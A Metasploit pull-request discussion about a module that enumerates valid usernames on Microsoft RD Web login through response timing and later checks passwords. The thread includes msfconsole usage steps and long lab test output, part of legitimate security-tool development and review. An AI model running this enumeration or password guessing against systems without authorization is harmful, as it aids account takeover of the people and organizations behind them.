RDP Web Login User Enumeration Auxiliary Module #14544

k0pak4 · 2020-12-23T17:05:16Z

The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability that is present for OWA (see owa scanner modules). By analyzing the time it takes for a failed response, the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.

Verification

Start msfconsole
use auxiliary/scanner/http/rdp_web_login
set rhost TARGET_IP
set username USER_OR_FILE
set domain DOMAIN (Only if you don't want to test the domain discovery feature)
run
Check output for validity of your test username(s)/domain

Scenarios

Specific target output replaced with Ys so as not to disclose information

msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
username => /home/kali/users.txt
msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS YY.YYY.YYY.YY
RHOSTS => YY.YYY.YYY.YY
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for YY.YYY.YYY.YY...
[+] Found Domain: YYYYYYYYYYYY
[-] Username YYYYYYYYYYYY\wrong is invalid! No response received in 1250 milliseconds
[+] Username YYYYYYYYYYYY\YYYYY is valid! Response received in 628.877 milliseconds
[-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Version and OS

Tested against Microsoft IIS 10.0 and RDWeb 2019

…nst a domain

label-actions · 2020-12-23T17:53:17Z

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

gwillcox-r7 · 2020-12-23T17:54:56Z

@k0pak4 Can also run tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/rdp_web_login.md and resolve any issues that are thrown up there to bring the documentation in line with our documentation standards. Feel free to reach out if anything is confusing though, I know there are some warnings like URLs which make the line too long that you can safely ignore.

k0pak4 · 2020-12-23T18:39:17Z

@k0pak4 Can also run tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/rdp_web_login.md and resolve any issues that are thrown up there to bring the documentation in line with our documentation standards. Feel free to reach out if anything is confusing though, I know there are some warnings like URLs which make the line too long that you can safely ignore.

I've fixed the outputs from running msftidy on the documentation and module, and additionally went through and cleaned up additional pylint warnings for PEP-8 compliance since this is a python module. Let me know if there's anything else I can do!

acammack-r7 · 2021-01-07T15:22:38Z

Hi @k0pak4, this looks nifty! It looks like the endpoint you are hitting could take a password if we wanted it to. Do you think this could be converted to a full login scanner like https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/jenkins.rb ? Either way, we will want to capture the results of the user enumeration in the database. On the Ruby side, the report will need to look something like

metasploit-framework/modules/auxiliary/scanner/ssh/ssh_enumusers.rb

Line 166 in b4e8827

def do_report(ip, user, port)

The external module login reporting code in

metasploit-framework/lib/msf/core/module/external.rb

Line 133 in b4e8827

def handle_credential_login(data, mod)

is pretty close to being able to handle this case, so after a little modification there and to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/modules/external/python/metasploit/module.py you could report the username with something like module.report_valid_username(username, 'domain': domain).

k0pak4 · 2021-01-07T16:21:31Z

Hi @k0pak4, this looks nifty! It looks like the endpoint you are hitting could take a password if we wanted it to. Do you think this could be converted to a full login scanner like https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/jenkins.rb ? Either way, we will want to capture the results of the user enumeration in the database. On the Ruby side, the report will need to look something like

metasploit-framework/modules/auxiliary/scanner/ssh/ssh_enumusers.rb

Line 166 in b4e8827

def do_report(ip, user, port)

The external module login reporting code in

metasploit-framework/lib/msf/core/module/external.rb

Line 133 in b4e8827

def handle_credential_login(data, mod)

is pretty close to being able to handle this case, so after a little modification there and to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/modules/external/python/metasploit/module.py you could report the username with something like module.report_valid_username(username, 'domain': domain).

Thanks! Yeah, it can take a password in the request as well. I'll first work on reporting the username enumeration to the database, because then the module will at least be complete and usable for that purpose and then afterwards work on converting it to a full login scanner with password checks too.

k0pak4 · 2021-01-08T12:43:51Z

@acammack-r7 I was able to report valid usernames with my latest commit, but I don't think I'm adding on the domain correctly. It was my understanding I should add it to the realm field but when I do so it doesn't appear in the realm column of the creds output. Any thoughts on what I may be doing wrong to allow for handle_credential_login to accept domains and add them to the realm field?

k0pak4 · 2021-01-09T17:11:41Z

@acammack-r7 I've now converted this to a full login scanner that can check passwords as well. I still am looking for assistance with the domain reporting, but it otherwise works as intended. I'll update the documentation as well early next week

k0pak4 · 2021-01-10T01:36:35Z

@acammack-r7 Alright documentation has been updated and the password feature is fully tested. Here's a screenshot of the usage if that helps with the review!

bwatters-r7 · 2021-01-19T22:45:40Z

Thanks for the contribution! I just ran through some basic testing on this using a Windows 2016 DC I have.

I am not sure if I am sold on the behavior when there's no connection

I'm not super familiar with login scanners, but a couple things struck me as odd. At first, I did not have the right service installed on the target, and when I ran it anyway, I got:

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.134.131...
[-] Login testdomain\test: is invalid! No response received in 1250 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If you cannot talk to the service, does that count as an invalid name? Is that normal for login scanners? I figure in the case of a TCP service, if no connection can be made, that's a separate error?

After I got the service up and running, I ran it again, and got the result I was expecting with a single name

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.134.140...
[+] Password  is invalid but testdomain\Administrator is valid! Response received in 85.392 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials
===========

host             origin           service          public         private  realm  private_type  JtR Format
----             ------           -------          ------         -------  -----  ------------  ----------
192.168.134.140  192.168.134.140  443/tcp (RDWeb)  Administrator

When I used a list, things got odd

For lack of anything else that appeared, I tossed the unix_users list; I figured that I knew `Administrator` was a known user, and that likely there would be some failed names in there, too. That said, all came back as valid users and were added to the database credential store. ``` msf6 auxiliary(scanner/http/rdp_web_login) > set username data/wordlists/unix_users.txt username => data/wordlists/unix_users.txt msf6 auxiliary(scanner/http/rdp_web_login) > run

[] Running for 192.168.134.140...
[+] Password is invalid but testdomain\ is valid! Response received in 93.256 milliseconds
[+] Password is invalid but testdomain\4Dgifts is valid! Response received in 42.793 milliseconds
[+] Password is invalid but testdomain\abrt is valid! Response received in 41.709 milliseconds
[+] Password is invalid but testdomain\adm is valid! Response received in 42.495 milliseconds
[+] Password is invalid but testdomain\admin is valid! Response received in 27.624 milliseconds
[+] Password is invalid but testdomain\administrator is valid! Response received in 28.536 milliseconds
[+] Password is invalid but testdomain\anon is valid! Response received in 29.91 milliseconds
[+] Password is invalid but testdomain_apt is valid! Response received in 31.567 milliseconds
[+] Password is invalid but testdomain\arpwatch is valid! Response received in 26.106 milliseconds
[+] Password is invalid but testdomain\auditor is valid! Response received in 29.287 milliseconds
[+] Password is invalid but testdomain\avahi is valid! Response received in 30.008 milliseconds
[+] Password is invalid but testdomain\avahi-autoipd is valid! Response received in 29.271 milliseconds
[+] Password is invalid but testdomain\backup is valid! Response received in 30.046 milliseconds
[+] Password is invalid but testdomain\bbs is valid! Response received in 31.462 milliseconds
[+] Password is invalid but testdomain\beef-xss is valid! Response received in 28.114 milliseconds
[+] Password is invalid but testdomain\bin is valid! Response received in 28.486 milliseconds
[+] Password is invalid but testdomain\bitnami is valid! Response received in 29.984 milliseconds
[+] Password is invalid but testdomain\checkfs is valid! Response received in 28.157 milliseconds
[+] Password is invalid but testdomain\checkfsys is valid! Response received in 30.602 milliseconds
[+] Password is invalid but testdomain\checksys is valid! Response received in 42.985 milliseconds
[+] Password is invalid but testdomain\chronos is valid! Response received in 25.831 milliseconds
[+] Password is invalid but testdomain\chrony is valid! Response received in 30.977 milliseconds
[+] Password is invalid but testdomain\cmwlogin is valid! Response received in 28.8 milliseconds
[+] Password is invalid but testdomain\cockpit-ws is valid! Response received in 29.969 milliseconds
[+] Password is invalid but testdomain\colord is valid! Response received in 43.406 milliseconds
[+] Password is invalid but testdomain\couchdb is valid! Response received in 31.596 milliseconds
[+] Password is invalid but testdomain\cups-pk-helper is valid! Response received in 29.135 milliseconds
[+] Password is invalid but testdomain\daemon is valid! Response received in 27.938 milliseconds
[+] Password is invalid but testdomain\dbadmin is valid! Response received in 44.315 milliseconds
[+] Password is invalid but testdomain\dbus is valid! Response received in 29.4 milliseconds
[+] Password is invalid but testdomain\Debian-exim is valid! Response received in 28.075 milliseconds
[+] Password is invalid but testdomain\Debian-snmp is valid! Response received in 29.583 milliseconds
[+] Password is invalid but testdomain\demo is valid! Response received in 44.043 milliseconds
[+] Password is invalid but testdomain\demos is valid! Response received in 28.791 milliseconds
[+] Password is invalid but testdomain\diag is valid! Response received in 28.616 milliseconds
[+] Password is invalid but testdomain\distccd is valid! Response received in 28.294 milliseconds
[+] Password is invalid but testdomain\dni is valid! Response received in 28.283 milliseconds
[+] Password is invalid but testdomain\dnsmasq is valid! Response received in 30.788 milliseconds
[+] Password is invalid but testdomain\dradis is valid! Response received in 27.195 milliseconds
[+] Password is invalid but testdomain\EZsetup is valid! Response received in 29.497 milliseconds
[+] Password is invalid but testdomain\fal is valid! Response received in 29.376 milliseconds
[+] Password is invalid but testdomain\fax is valid! Response received in 29.561 milliseconds
[+] Password is invalid but testdomain\ftp is valid! Response received in 30.883 milliseconds
[+] Password is invalid but testdomain\games is valid! Response received in 27.408 milliseconds
[+] Password is invalid but testdomain\gdm is valid! Response received in 29.772 milliseconds
[+] Password is invalid but testdomain\geoclue is valid! Response received in 29.912 milliseconds
[+] Password is invalid but testdomain\gnats is valid! Response received in 30.083 milliseconds
[+] Password is invalid but testdomain\gnome-initial-setup is valid! Response received in 26.477 milliseconds
[+] Password is invalid but testdomain\gopher is valid! Response received in 32.472 milliseconds
[+] Password is invalid but testdomain\gropher is valid! Response received in 29.908 milliseconds
[+] Password is invalid but testdomain\guest is valid! Response received in 28.552 milliseconds
[+] Password is invalid but testdomain\haldaemon is valid! Response received in 30.46 milliseconds
[+] Password is invalid but testdomain\halt is valid! Response received in 26.979 milliseconds
[+] Password is invalid but testdomain\hplip is valid! Response received in 29.929 milliseconds
[+] Password is invalid but testdomain\inetsim is valid! Response received in 29.773 milliseconds
[+] Password is invalid but testdomain\informix is valid! Response received in 29.195 milliseconds
[+] Password is invalid but testdomain\install is valid! Response received in 30.223 milliseconds
[+] Password is invalid but testdomain\iodine is valid! Response received in 29.879 milliseconds
[+] Password is invalid but testdomain\irc is valid! Response received in 29.625 milliseconds
[+] Password is invalid but testdomain\jet is valid! Response received in 25.644 milliseconds
[+] Password is invalid but testdomain\karaf is valid! Response received in 29.976 milliseconds
[+] Password is invalid but testdomain\kernoops is valid! Response received in 29.907 milliseconds
[+] Password is invalid but testdomain\king-phisher is valid! Response received in 28.439 milliseconds
[+] Password is invalid but testdomain\landscape is valid! Response received in 29.462 milliseconds
[+] Password is invalid but testdomain\libstoragemgmt is valid! Response received in 30.125 milliseconds
[+] Password is invalid but testdomain\libuuid is valid! Response received in 29.914 milliseconds
[+] Password is invalid but testdomain\lightdm is valid! Response received in 29.944 milliseconds
[+] Password is invalid but testdomain\list is valid! Response received in 29.758 milliseconds
[+] Password is invalid but testdomain\listen is valid! Response received in 29.966 milliseconds
[+] Password is invalid but testdomain\lp is valid! Response received in 29.955 milliseconds
[+] Password is invalid but testdomain\lpadm is valid! Response received in 29.353 milliseconds
[+] Password is invalid but testdomain\lpadmin is valid! Response received in 29.861 milliseconds
[+] Password is invalid but testdomain\lxd is valid! Response received in 29.912 milliseconds
[+] Password is invalid but testdomain\lynx is valid! Response received in 29.071 milliseconds
[+] Password is invalid but testdomain\mail is valid! Response received in 29.076 milliseconds
[+] Password is invalid but testdomain\man is valid! Response received in 30.723 milliseconds
[+] Password is invalid but testdomain\me is valid! Response received in 27.413 milliseconds
[+] Password is invalid but testdomain\messagebus is valid! Response received in 27.767 milliseconds
[+] Password is invalid but testdomain\miredo is valid! Response received in 28.103 milliseconds
[+] Password is invalid but testdomain\mountfs is valid! Response received in 29.667 milliseconds
[+] Password is invalid but testdomain\mountfsys is valid! Response received in 30.439 milliseconds
[+] Password is invalid but testdomain\mountsys is valid! Response received in 27.17 milliseconds
[+] Password is invalid but testdomain\mysql is valid! Response received in 28.897 milliseconds
[+] Password is invalid but testdomain\news is valid! Response received in 29.887 milliseconds
[+] Password is invalid but testdomain\noaccess is valid! Response received in 29.453 milliseconds
[+] Password is invalid but testdomain\nobody is valid! Response received in 29.063 milliseconds
[+] Password is invalid but testdomain\nobody4 is valid! Response received in 29.637 milliseconds
[+] Password is invalid but testdomain\ntp is valid! Response received in 29.604 milliseconds
[+] Password is invalid but testdomain\nuucp is valid! Response received in 29.737 milliseconds
[+] Password is invalid but testdomain\nxautomation is valid! Response received in 30.401 milliseconds
[+] Password is invalid but testdomain\nxpgsql is valid! Response received in 31.543 milliseconds
[+] Password is invalid but testdomain\omi is valid! Response received in 25.966 milliseconds
[+] Password is invalid but testdomain\omsagent is valid! Response received in 29.734 milliseconds
[+] Password is invalid but testdomain\operator is valid! Response received in 28.855 milliseconds
[+] Password is invalid but testdomain\oracle is valid! Response received in 29.431 milliseconds
[+] Password is invalid but testdomain\OutOfBox is valid! Response received in 27.995 milliseconds
[+] Password is invalid but testdomain\pi is valid! Response received in 30.041 milliseconds
[+] Password is invalid but testdomain\polkitd is valid! Response received in 28.49 milliseconds
[+] Password is invalid but testdomain\pollinate is valid! Response received in 29.972 milliseconds
[+] Password is invalid but testdomain\popr is valid! Response received in 29.755 milliseconds
[+] Password is invalid but testdomain\postfix is valid! Response received in 29.687 milliseconds
[+] Password is invalid but testdomain\postgres is valid! Response received in 29.699 milliseconds
[+] Password is invalid but testdomain\postmaster is valid! Response received in 29.799 milliseconds
[+] Password is invalid but testdomain\printer is valid! Response received in 29.826 milliseconds
[+] Password is invalid but testdomain\proxy is valid! Response received in 30.139 milliseconds
[+] Password is invalid but testdomain\pulse is valid! Response received in 29.851 milliseconds
[+] Password is invalid but testdomain\redsocks is valid! Response received in 30.334 milliseconds
[+] Password is invalid but testdomain\rfindd is valid! Response received in 27.733 milliseconds
[+] Password is invalid but testdomain\rje is valid! Response received in 29.325 milliseconds
[+] Password is invalid but testdomain\root is valid! Response received in 27.267 milliseconds
[+] Password is invalid but testdomain\ROOT is valid! Response received in 29.647 milliseconds
[+] Password is invalid but testdomain\rooty is valid! Response received in 29.882 milliseconds
[+] Password is invalid but testdomain\rpc is valid! Response received in 29.919 milliseconds
[+] Password is invalid but testdomain\rpcuser is valid! Response received in 29.325 milliseconds
[+] Password is invalid but testdomain\rtkit is valid! Response received in 29.591 milliseconds
[+] Password is invalid but testdomain\rwhod is valid! Response received in 30.033 milliseconds
[+] Password is invalid but testdomain\saned is valid! Response received in 29.769 milliseconds
[+] Password is invalid but testdomain\service is valid! Response received in 29.486 milliseconds
[+] Password is invalid but testdomain\setroubleshoot is valid! Response received in 29.812 milliseconds
[+] Password is invalid but testdomain\setup is valid! Response received in 30.216 milliseconds
[+] Password is invalid but testdomain\sgiweb is valid! Response received in 30.364 milliseconds
[+] Password is invalid but testdomain\shutdown is valid! Response received in 26.636 milliseconds
[+] Password is invalid but testdomain\sigver is valid! Response received in 28.723 milliseconds
[+] Password is invalid but testdomain\speech-dispatcher is valid! Response received in 30.438 milliseconds
[+] Password is invalid but testdomain\sshd is valid! Response received in 34.81 milliseconds
[+] Password is invalid but testdomain\sslh is valid! Response received in 29.277 milliseconds
[+] Password is invalid but testdomain\sssd is valid! Response received in 29.215 milliseconds
[+] Password is invalid but testdomain\stunnel4 is valid! Response received in 30.319 milliseconds
[+] Password is invalid but testdomain\sym is valid! Response received in 29.646 milliseconds
[+] Password is invalid but testdomain\symop is valid! Response received in 29.873 milliseconds
[+] Password is invalid but testdomain\sync is valid! Response received in 30.597 milliseconds
[+] Password is invalid but testdomain\sys is valid! Response received in 29.216 milliseconds
[+] Password is invalid but testdomain\sysadm is valid! Response received in 29.796 milliseconds
[+] Password is invalid but testdomain\sysadmin is valid! Response received in 29.592 milliseconds
[+] Password is invalid but testdomain\sysbin is valid! Response received in 30.924 milliseconds
[+] Password is invalid but testdomain\syslog is valid! Response received in 25.953 milliseconds
[+] Password is invalid but testdomain\system_admin is valid! Response received in 30.208 milliseconds
[+] Password is invalid but testdomain\systemd-bus-proxy is valid! Response received in 29.813 milliseconds
[+] Password is invalid but testdomain\systemd-coredump is valid! Response received in 30.687 milliseconds
[+] Password is invalid but testdomain\systemd-network is valid! Response received in 27.133 milliseconds
[+] Password is invalid but testdomain\systemd-resolve is valid! Response received in 28.76 milliseconds
[+] Password is invalid but testdomain\systemd-timesync is valid! Response received in 30.245 milliseconds
[+] Password is invalid but testdomain\tcpdump is valid! Response received in 29.308 milliseconds
[+] Password is invalid but testdomain\trouble is valid! Response received in 30.299 milliseconds
[+] Password is invalid but testdomain\tss is valid! Response received in 29.729 milliseconds
[+] Password is invalid but testdomain\udadmin is valid! Response received in 29.411 milliseconds
[+] Password is invalid but testdomain\ultra is valid! Response received in 30.004 milliseconds
[+] Password is invalid but testdomain\umountfs is valid! Response received in 30.01 milliseconds
[+] Password is invalid but testdomain\umountfsys is valid! Response received in 29.724 milliseconds
[+] Password is invalid but testdomain\umountsys is valid! Response received in 29.792 milliseconds
[+] Password is invalid but testdomain\unix is valid! Response received in 30.782 milliseconds
[+] Password is invalid but testdomain\unscd is valid! Response received in 26.649 milliseconds
[+] Password is invalid but testdomain\us_admin is valid! Response received in 28.439 milliseconds
[+] Password is invalid but testdomain\usbmux is valid! Response received in 30.004 milliseconds
[+] Password is invalid but testdomain\user is valid! Response received in 30.362 milliseconds
[+] Password is invalid but testdomain\uucp is valid! Response received in 28.951 milliseconds
[+] Password is invalid but testdomain\uucpadm is valid! Response received in 29.989 milliseconds
[+] Password is invalid but testdomain\uuidd is valid! Response received in 30.668 milliseconds
[+] Password is invalid but testdomain\vagrant is valid! Response received in 28.999 milliseconds
[+] Password is invalid but testdomain\varnish is valid! Response received in 26.632 milliseconds
[+] Password is invalid but testdomain\web is valid! Response received in 30.121 milliseconds
[+] Password is invalid but testdomain\webmaster is valid! Response received in 28.993 milliseconds
[+] Password is invalid but testdomain\whoopsie is valid! Response received in 29.762 milliseconds
[+] Password is invalid but testdomain\www is valid! Response received in 29.953 milliseconds
[+] Password is invalid but testdomain\www-data is valid! Response received in 29.646 milliseconds
[+] Password is invalid but testdomain\xpdb is valid! Response received in 29.969 milliseconds
[+] Password is invalid but testdomain\xpopr is valid! Response received in 30.504 milliseconds
[+] Password is invalid but testdomain\zabbix is valid! Response received in 28.106 milliseconds
[] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials

host origin service public private realm private_type JtR Format

192.168.134.140 192.168.134.140 443/tcp (RDWeb) Administrator
192.168.134.140 192.168.134.140 443/tcp (RDWeb) msfuser
192.168.134.140 192.168.134.140 443/tcp (RDWeb)
192.168.134.140 192.168.134.140 443/tcp (RDWeb) 4Dgifts
192.168.134.140 192.168.134.140 443/tcp (RDWeb) abrt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) adm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) admin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) administrator
192.168.134.140 192.168.134.140 443/tcp (RDWeb) anon
192.168.134.140 192.168.134.140 443/tcp (RDWeb) _apt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) arpwatch
192.168.134.140 192.168.134.140 443/tcp (RDWeb) auditor
192.168.134.140 192.168.134.140 443/tcp (RDWeb) avahi
192.168.134.140 192.168.134.140 443/tcp (RDWeb) avahi-autoipd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) backup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) bbs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) beef-xss
192.168.134.140 192.168.134.140 443/tcp (RDWeb) bin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) bitnami
192.168.134.140 192.168.134.140 443/tcp (RDWeb) checkfs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) checkfsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) checksys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) chronos
192.168.134.140 192.168.134.140 443/tcp (RDWeb) chrony
192.168.134.140 192.168.134.140 443/tcp (RDWeb) cmwlogin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) cockpit-ws
192.168.134.140 192.168.134.140 443/tcp (RDWeb) colord
192.168.134.140 192.168.134.140 443/tcp (RDWeb) couchdb
192.168.134.140 192.168.134.140 443/tcp (RDWeb) cups-pk-helper
192.168.134.140 192.168.134.140 443/tcp (RDWeb) daemon
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dbadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dbus
192.168.134.140 192.168.134.140 443/tcp (RDWeb) Debian-exim
192.168.134.140 192.168.134.140 443/tcp (RDWeb) Debian-snmp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) demo
192.168.134.140 192.168.134.140 443/tcp (RDWeb) demos
192.168.134.140 192.168.134.140 443/tcp (RDWeb) diag
192.168.134.140 192.168.134.140 443/tcp (RDWeb) distccd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dni
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dnsmasq
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dradis
192.168.134.140 192.168.134.140 443/tcp (RDWeb) EZsetup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) fal
192.168.134.140 192.168.134.140 443/tcp (RDWeb) fax
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ftp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) games
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gdm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) geoclue
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gnats
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gnome-initial-setup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gopher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gropher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) guest
192.168.134.140 192.168.134.140 443/tcp (RDWeb) haldaemon
192.168.134.140 192.168.134.140 443/tcp (RDWeb) halt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) hplip
192.168.134.140 192.168.134.140 443/tcp (RDWeb) inetsim
192.168.134.140 192.168.134.140 443/tcp (RDWeb) informix
192.168.134.140 192.168.134.140 443/tcp (RDWeb) install
192.168.134.140 192.168.134.140 443/tcp (RDWeb) iodine
192.168.134.140 192.168.134.140 443/tcp (RDWeb) irc
192.168.134.140 192.168.134.140 443/tcp (RDWeb) jet
192.168.134.140 192.168.134.140 443/tcp (RDWeb) karaf
192.168.134.140 192.168.134.140 443/tcp (RDWeb) kernoops
192.168.134.140 192.168.134.140 443/tcp (RDWeb) king-phisher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) landscape
192.168.134.140 192.168.134.140 443/tcp (RDWeb) libstoragemgmt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) libuuid
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lightdm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) list
192.168.134.140 192.168.134.140 443/tcp (RDWeb) listen
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lpadm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lpadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lxd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lynx
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mail
192.168.134.140 192.168.134.140 443/tcp (RDWeb) man
192.168.134.140 192.168.134.140 443/tcp (RDWeb) me
192.168.134.140 192.168.134.140 443/tcp (RDWeb) messagebus
192.168.134.140 192.168.134.140 443/tcp (RDWeb) miredo
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mountfs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mountfsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mountsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mysql
192.168.134.140 192.168.134.140 443/tcp (RDWeb) news
192.168.134.140 192.168.134.140 443/tcp (RDWeb) noaccess
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nobody
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nobody4
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ntp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nuucp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nxautomation
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nxpgsql
192.168.134.140 192.168.134.140 443/tcp (RDWeb) omi
192.168.134.140 192.168.134.140 443/tcp (RDWeb) omsagent
192.168.134.140 192.168.134.140 443/tcp (RDWeb) operator
192.168.134.140 192.168.134.140 443/tcp (RDWeb) oracle
192.168.134.140 192.168.134.140 443/tcp (RDWeb) OutOfBox
192.168.134.140 192.168.134.140 443/tcp (RDWeb) pi
192.168.134.140 192.168.134.140 443/tcp (RDWeb) polkitd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) pollinate
192.168.134.140 192.168.134.140 443/tcp (RDWeb) popr
192.168.134.140 192.168.134.140 443/tcp (RDWeb) postfix
192.168.134.140 192.168.134.140 443/tcp (RDWeb) postgres
192.168.134.140 192.168.134.140 443/tcp (RDWeb) postmaster
192.168.134.140 192.168.134.140 443/tcp (RDWeb) printer
192.168.134.140 192.168.134.140 443/tcp (RDWeb) proxy
192.168.134.140 192.168.134.140 443/tcp (RDWeb) pulse
192.168.134.140 192.168.134.140 443/tcp (RDWeb) redsocks
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rfindd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rje
192.168.134.140 192.168.134.140 443/tcp (RDWeb) root
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ROOT
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rooty
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rpc
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rpcuser
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rtkit
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rwhod
192.168.134.140 192.168.134.140 443/tcp (RDWeb) saned
192.168.134.140 192.168.134.140 443/tcp (RDWeb) service
192.168.134.140 192.168.134.140 443/tcp (RDWeb) setroubleshoot
192.168.134.140 192.168.134.140 443/tcp (RDWeb) setup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sgiweb
192.168.134.140 192.168.134.140 443/tcp (RDWeb) shutdown
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sigver
192.168.134.140 192.168.134.140 443/tcp (RDWeb) speech-dispatcher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sshd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sslh
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sssd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) stunnel4
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sym
192.168.134.140 192.168.134.140 443/tcp (RDWeb) symop
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sync
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sysadm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sysadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sysbin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) syslog
192.168.134.140 192.168.134.140 443/tcp (RDWeb) system_admin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-bus-proxy
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-coredump
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-network
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-resolve
192.168.134.140 192.168.134.140 443/tcp (RDWeb) systemd-timesync
192.168.134.140 192.168.134.140 443/tcp (RDWeb) tcpdump
192.168.134.140 192.168.134.140 443/tcp (RDWeb) trouble
192.168.134.140 192.168.134.140 443/tcp (RDWeb) tss
192.168.134.140 192.168.134.140 443/tcp (RDWeb) udadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ultra
192.168.134.140 192.168.134.140 443/tcp (RDWeb) umountfs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) umountfsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) umountsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) unix
192.168.134.140 192.168.134.140 443/tcp (RDWeb) unscd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) us_admin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) usbmux
192.168.134.140 192.168.134.140 443/tcp (RDWeb) user
192.168.134.140 192.168.134.140 443/tcp (RDWeb) uucp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) uucpadm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) uuidd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) vagrant
192.168.134.140 192.168.134.140 443/tcp (RDWeb) varnish
192.168.134.140 192.168.134.140 443/tcp (RDWeb) web
192.168.134.140 192.168.134.140 443/tcp (RDWeb) webmaster
192.168.134.140 192.168.134.140 443/tcp (RDWeb) whoopsie
